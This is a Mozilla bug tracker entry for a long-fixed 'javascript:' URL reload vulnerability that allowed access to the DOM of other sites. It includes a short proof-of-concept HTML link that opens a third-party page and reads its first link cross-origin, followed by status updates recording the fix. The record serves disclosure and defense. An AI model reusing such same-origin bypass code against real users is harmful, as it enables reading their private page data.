Closed
Bug 25062
Opened 25 years ago
Closed 25 years ago
Reload vulnerability
Categories
(Core :: Security, defect, P3)
Tracking
()
VERIFIED
FIXED
M14
People
(Reporter: joro, Assigned: norrisboyd)
References
()
Details
(Whiteboard: [PDT+] Expected resolution date: 2/11)
There is a vulnerability when reloading "javascript:" URLs which allows
accessing the DOM of arbitrary documents. Mozilla trusts too much the location
bar.
The code is:
---------------------------------------------
<A
HREF="javascript:a=window.open('http://www.yahoo.com','victim');a.setTimeout('al
ert(\'Here is the first link: \'+document.links[0].href)',5000);alert('Reload
the blank page (with empty location bar) once');" TARGET="_content2">Click here
to start</A>
---------------------------------------------
Assignee | ||
Updated•25 years ago
|
Assignee | ||
Updated•25 years ago
|
Group: netscapeconfidential?
Assignee | ||
Updated•25 years ago
|
Whiteboard: [PDT+] → [PDT+] Fix in hand
Assignee | ||
Updated•25 years ago
|
Whiteboard: [PDT+] Fix in hand → [PDT+] Expected resolution date: 2/11
Assignee | ||
Comment 2•25 years ago
|
||
Checked in fix
Status: ASSIGNED → RESOLVED
Closed: 25 years ago
Resolution: --- → FIXED
Bulk moving all Browser Security bugs to new Security: General component. The
previous Security component for Browser will be deleted.
Component: Security → Security: General
Updated•20 years ago
|
Flags: testcase+
Updated•18 years ago
|
Flags: in-testsuite+ → in-testsuite?
You need to log in
before you can comment on or make changes to this bug.
Description
•